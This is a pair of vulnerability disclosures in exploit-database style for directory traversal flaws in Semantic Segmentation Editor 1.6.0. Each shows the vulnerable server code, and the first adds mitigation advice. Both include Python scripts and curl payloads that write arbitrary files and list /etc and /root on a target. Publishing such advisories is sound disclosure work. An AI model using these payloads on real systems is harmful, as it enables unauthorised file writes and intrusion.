**Exploit Title:** Semantic Segmentation Editor 1.6.0 - Directory Traversal File Upload
**Date:** 2025-03-14
**Exploit Author:** Fatih Türüt ([defendzero.com](https://defendzero.com))
**Vendor Homepage:** [Hitachi Automotive & Industry Lab](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor)
**Software Download:** [Semantic Segmentation Editor 1.6.0](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip)
**Version:** 1.6.0
**Tested on:** macOS 24.3.0
**Category:** Webapps
**CVE:** N/A

---

## **Description:**

A **directory traversal vulnerability** exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation in the file upload functionality. This flaw allows an attacker to manipulate file paths and write arbitrary files outside the intended directory on the server.

### **Vulnerable Component:**

- **File:** `server/main.js`
- **Function:** `'saveData'(sample)`
- **Issue:** User input is decoded and processed without validating whether the file remains inside the allowed directory.

### **Vulnerable Code:**

```javascript
'saveData'(sample) {
    if (demoMode) return;
    const attrs = url.parse(sample.url);
    // The pathname is URL-decoded, so an encoded "%2f..%2f" becomes "/../"
    let path = decodeURIComponent(attrs.pathname);
    // folder and file are taken straight from the decoded, attacker-controlled path
    sample.folder = path.substring(1, path.lastIndexOf("/"));
    sample.file = path.substring(path.lastIndexOf("/") + 1);
    // No path validation is performed
}
```

---

## **Proof of Concept (PoC):**

An attacker can exploit this vulnerability by crafting a request to save files outside the intended directory.

### **Exploit Script (Python)**

```python
import requests
from urllib.parse import quote

# Target file path, relative to the application's images folder
target_path = "../../../tmp/malicious.txt"
# Percent-encode the slashes as well (safe=""), giving
# "%2F..%2F..%2F..%2Ftmp%2Fmalicious.txt", the same payload as the curl example below
encoded_path = quote("/" + target_path, safe="")
url = f"http://target:3000/save/{encoded_path}"
content = "Malicious content here"

# Send content directly
response = requests.post(url, data=content)
print(response.text)
```

---

### **Example curl Command:**

```bash
curl -X POST -d "Malicious content here" "http://target:3000/save/%2f..%2f..%2f..%2ftmp%2fmalicious.txt"
```

---

## **Impact:**

Successful exploitation allows an attacker to write arbitrary files to the server, potentially leading to remote code execution (RCE) if an executable file is placed in a web-accessible directory.

### **Mitigation:**

The vendor should validate the decoded path before using it: resolve it against the intended base directory with `path.resolve()` and reject the request unless the result is the base directory itself or lies beneath it (compare against the base with a trailing separator). `path.normalize()` on its own is not sufficient, since it collapses the `..` segments but still yields a path outside the base.

---
----------------------------------------

Title: Semantic Segmentation Editor 1.6.0 - Directory Traversal Vulnerability

Description: A directory traversal vulnerability exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation. An attacker can manipulate the directory browsing endpoint to list arbitrary directories on the server.

Source URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor
Source Name/Email: Halil İbrahim İlhan (halil@defendzero.com)
CVEs: N/A
Software URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip

Vulnerable Component:

- **File:** server/main.js
- **Function:** 'images'(folder, pageIndex, pageLength)
- **Issue:** The application decodes user input without validating if it stays within the intended directory scope.

Vulnerable Code:

```javascript
'images'(folder, pageIndex, pageLength) {
    // folder is URL-decoded and joined onto the images root as-is
    const folderSlash = folder ? decodeURIComponent(folder) + "/" : "/";
    const leaf = join(config.imagesFolder, (folderSlash ? folderSlash : ""));
    // No path validation is performed before accessing the directory
    const dirs = getDirectories(leaf);
    const images = getImages(leaf);
}
```

### **Proof of Concept (PoC):**

An attacker can exploit this vulnerability by sending specially crafted requests. The following Python script demonstrates the exploitation of the vulnerability:

```python
import requests
from urllib.parse import quote


def list_directory(path):
    """Exploit for directory traversal vulnerability in Semantic Segmentation Editor 1.6.0."""
    # Percent-encode the slashes as well (safe=""), matching the curl payloads below
    encoded_path = quote("/" + path, safe="")
    url = f"http://target:3000/browse/0/20/{encoded_path}"
    response = requests.get(url)
    print(f"Listing contents of: {path}")
    return response.text


if __name__ == "__main__":
    print(list_directory("../../../etc"))   # List /etc directory
    print(list_directory("../../../root"))  # List /root directory
```

### **Example curl commands:**

```bash
# List /etc directory
curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2fetc"

# List /root directory
curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2froot"
```